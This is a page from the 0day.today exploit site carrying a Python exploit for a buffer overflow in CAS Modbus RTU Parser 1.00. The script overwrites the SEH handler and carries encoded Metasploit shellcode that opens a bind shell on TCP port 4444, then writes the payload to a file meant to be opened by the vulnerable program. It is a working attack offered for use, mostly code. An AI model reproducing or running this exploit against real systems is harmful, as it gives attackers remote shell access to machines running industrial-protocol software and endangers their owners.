0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CAS Modbus RTU Parser Buffer Overflow Exploit
hello, nice to meet u A few day ago, Senator of Pirates published CAS Modbus RTU Parser Buffer Overflow PoC code, so i try to make Exploit Code, This is ~ # Exploit Title: CAS Modbus RTU Parser Buffer Overflow Exploit # Date: 2012,09,07 # Author: Senator of Pirates / h2spice # Vendor or Software Link: http://www.chipkin.com/technical-resources/cas-modbus-rtu-parser/ # Version: 1.00 # Category:: local # analysis pdf: http://training.nshc.net/halfday_analysis/20120911_CAS_Modbus_RTU_Parser_1.0_Buffer_Overflow_%EC%B7%A8%EC%95%BD%EC%A0%90_%EB%B6%84%EC%84%9D%EB%B3%B4%EA%B3%A0%EC%84%9C.pdf # Tested on: xp sp3 ENG # facebook: /h2spice # Exploit Code : #!/usr/bin/python # #[+]Exploit Title: CAS Modbus RTU Parser 1.00 Buffer Overflow Exploit #[+]Date: 09\11\2012 #[+]Exploit Writer: H2spice #[+]Author: Senator of Pirates #[+]Tested On: WIN-XP SP3 Eng #[+]CVE: N/A # # from struct import pack import os import sys from time import sleep print ''' CAS Modbus RTU Parser 1.00 Buffer Overflow Exploit Created By h2spice (h2spice@hotmail.com) Author : Senator of Pirates ''' sleep(2) buf = ("\x41" * 18072) buf += ("\xeb\x08\x90\x90") #nSEH(jmp to shellcode) buf += pack('<L',0x004039ed)#SEH(pop/pop/ret) buf += ("\x90" * 20) #windows/shell_bind_tcp - 751 bytes #http://www.metasploit.com #Encoder: x86/alpha_upper #AutoRunScript=, VERBOSE=false, EXITFUNC=process, LPORT=4444, buf += ("\x89\xe5\xda\xcf\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43"+ "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"+ "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"+ "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"+ "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4c\x49\x45\x50"+ "\x35\x50\x53\x30\x35\x30\x4b\x39\x4a\x45\x36\x51\x38\x52\x33"+ "\x54\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x46\x32\x44\x4c\x4c\x4b"+ "\x30\x52\x45\x44\x4c\x4b\x33\x42\x37\x58\x44\x4f\x38\x37\x51"+ "\x5a\x57\x56\x50\x31\x4b\x4f\x36\x51\x4f\x30\x4e\x4c\x47\x4c"+ "\x53\x51\x43\x4c\x34\x42\x46\x4c\x37\x50\x49\x51\x38\x4f\x54"+ "\x4d\x53\x31\x38\x47\x4a\x42\x4a\x50\x36\x32\x56\x37\x4c\x4b"+ "\x56\x32\x44\x50\x4c\x4b\x37\x32\x37\x4c\x43\x31\x38\x50\x4c"+ "\x4b\x37\x30\x33\x48\x4b\x35\x59\x50\x54\x34\x31\x5a\x33\x31"+ "\x4e\x30\x36\x30\x4c\x4b\x30\x48\x52\x38\x4c\x4b\x56\x38\x57"+ "\x50\x53\x31\x4e\x33\x4a\x43\x57\x4c\x30\x49\x4c\x4b\x50\x34"+ "\x4c\x4b\x53\x31\x39\x46\x50\x31\x4b\x4f\x36\x51\x59\x50\x4e"+ "\x4c\x59\x51\x48\x4f\x34\x4d\x45\x51\x59\x57\x50\x38\x4b\x50"+ "\x53\x45\x5a\x54\x33\x33\x53\x4d\x4b\x48\x47\x4b\x33\x4d\x31"+ "\x34\x42\x55\x4a\x42\x46\x38\x4c\x4b\x36\x38\x31\x34\x45\x51"+ "\x38\x53\x55\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x50\x58\x35"+ "\x4c\x43\x31\x59\x43\x4c\x4b\x34\x44\x4c\x4b\x35\x51\x48\x50"+ "\x4c\x49\x31\x54\x31\x34\x57\x54\x51\x4b\x31\x4b\x55\x31\x56"+ "\x39\x30\x5a\x50\x51\x4b\x4f\x4d\x30\x31\x48\x31\x4f\x30\x5a"+ "\x4c\x4b\x54\x52\x5a\x4b\x4d\x56\x51\x4d\x33\x58\x37\x43\x47"+ "\x42\x45\x50\x53\x30\x43\x58\x34\x37\x53\x43\x46\x52\x31\x4f"+ "\x50\x54\x52\x48\x30\x4c\x54\x37\x46\x46\x53\x37\x4b\x4f\x39"+ "\x45\x58\x38\x4c\x50\x55\x51\x43\x30\x45\x50\x37\x59\x58\x44"+ "\x46\x34\x56\x30\x53\x58\x31\x39\x4d\x50\x32\x4b\x45\x50\x4b"+ "\x4f\x58\x55\x36\x30\x56\x30\x56\x30\x46\x30\x47\x30\x46\x30"+ "\x31\x50\x46\x30\x55\x38\x4a\x4a\x44\x4f\x39\x4f\x4b\x50\x4b"+ "\x4f\x48\x55\x4d\x59\x59\x57\x50\x31\x59\x4b\x30\x53\x55\x38"+ "\x55\x52\x35\x50\x52\x31\x51\x4c\x4b\x39\x4a\x46\x32\x4a\x32"+ "\x30\x31\x46\x50\x57\x35\x38\x49\x52\x59\x4b\x56\x57\x53\x57"+ "\x4b\x4f\x39\x45\x30\x53\x51\x47\x52\x48\x4e\x57\x4d\x39\x37"+ "\x48\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x50\x53\x30\x57\x35\x38"+ "\x44\x34\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x56\x37\x4c"+ "\x49\x58\x47\x43\x58\x34\x35\x42\x4e\x50\x4d\x53\x51\x4b\x4f"+ "\x58\x55\x55\x38\x43\x53\x52\x4d\x33\x54\x55\x50\x4c\x49\x4b"+ "\x53\x51\x47\x46\x37\x31\x47\x36\x51\x4c\x36\x33\x5a\x42\x32"+ "\x31\x49\x46\x36\x5a\x42\x4b\x4d\x45\x36\x48\x47\x47\x34\x31"+ "\x34\x37\x4c\x55\x51\x33\x31\x4c\x4d\x30\x44\x47\x54\x44\x50"+ "\x48\x46\x35\x50\x30\x44\x30\x54\x30\x50\x46\x36\x51\x46\x56"+ "\x36\x37\x36\x46\x36\x30\x4e\x31\x46\x51\x46\x51\x43\x31\x46"+ "\x32\x48\x52\x59\x48\x4c\x57\x4f\x4b\x36\x4b\x4f\x38\x55\x4d"+ "\x59\x4d\x30\x50\x4e\x56\x36\x51\x56\x4b\x4f\x36\x50\x43\x58"+ "\x54\x48\x4c\x47\x55\x4d\x33\x50\x4b\x4f\x4e\x35\x4f\x4b\x4a"+ "\x50\x58\x35\x4f\x52\x36\x36\x53\x58\x49\x36\x4d\x45\x4f\x4d"+ "\x4d\x4d\x4b\x4f\x58\x55\x47\x4c\x43\x36\x53\x4c\x35\x5a\x4d"+ "\x50\x4b\x4b\x4d\x30\x54\x35\x55\x55\x4f\x4b\x57\x37\x35\x43"+ "\x32\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41"+ "\x41") print "\t\t[+]Creating File Exploit.txt..." sleep(1) try: f = open("Exploit.txt","wb") f.write(buf) f.close() print "\t\t[+]File Exploit.txt Created." sleep(2) except: print "\t\t[-]Error in Create file Exploit.txt" sleep(1) # 0day.today [2024-07-05] #